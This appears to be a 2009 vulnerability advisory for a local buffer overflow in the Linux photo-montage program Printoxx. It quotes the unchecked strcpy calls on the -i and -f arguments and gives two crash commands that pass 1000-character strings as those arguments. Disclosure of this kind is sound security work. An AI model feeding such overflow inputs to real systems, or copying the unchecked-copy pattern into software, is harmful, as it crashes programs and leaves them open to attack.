49 lines
No EOL
1.7 KiB
Text
49 lines
No EOL
1.7 KiB
Text
# Exploit Title: Printoxx Local Buffer Overflow
|
|
# Date: 23 Dec, 2009
|
|
# Author: sandman, n4mdn4s [4T] gmail [D0T] com
|
|
# Software Link: http://kornelix.squarespace.com/printoxx/, http://kornelix.squarespace.com/storage/downloads/printoxx-2.1.2.tar.gz
|
|
|
|
# Version: <= 2.1.2
|
|
# Tested on: Fedora 12
|
|
# CVE: None
|
|
# Code:
|
|
|
|
Description:
|
|
"from website"
|
|
Printoxx is a free open source Linux program for making and printing a
|
|
photo montage. Images can be added to a layout page using the mouse to
|
|
|
|
select and drop into place. Images can be moved around and resized
|
|
using the mouse. Text can be added using any font, and moved around as
|
|
needed.
|
|
|
|
Vulnerability:
|
|
Printoxx does not check the length of input filename/directory thus overwriting the buffer [1000 in size] with a call to strcpy. The affected code segment is shown below.
|
|
|
|
|
|
Affected Code Segment:
|
|
.....
|
|
else if (strEqu(argv[ii],"-i") && argc > ii+1) // -i imageDirectory
|
|
strcpy(imagedirk,argv[++ii]); //Overflow
|
|
else if (strEqu(argv[ii],"-f") && argc > ii+1) // -f imageFile
|
|
|
|
strcpy(clfile,argv[++ii]); //Overflow
|
|
else strcpy(clfile,argv[ii]); //Overflow // assume imageFile
|
|
}
|
|
......
|
|
|
|
Proof Of Concept:
|
|
Image filename overflow:
|
|
|
|
$ ./printoxx -i $(python -c 'print "A"*1000')
|
|
|
|
Directory filename overflow:
|
|
$ ./printoxx -f $(python -c 'print "A"*1000')
|
|
|
|
Severity: Very Low
|
|
|
|
Note: Since this was tested on Fedora 12, the system automatically detected the operation as a possible buffer overflow attempt instead of a regular segfault. This is due to the fact that all executables on Red-Hat
|
|
|
|
RHEL and Fedora systems are compiled with canaries enabled.
|
|
|
|
#$ |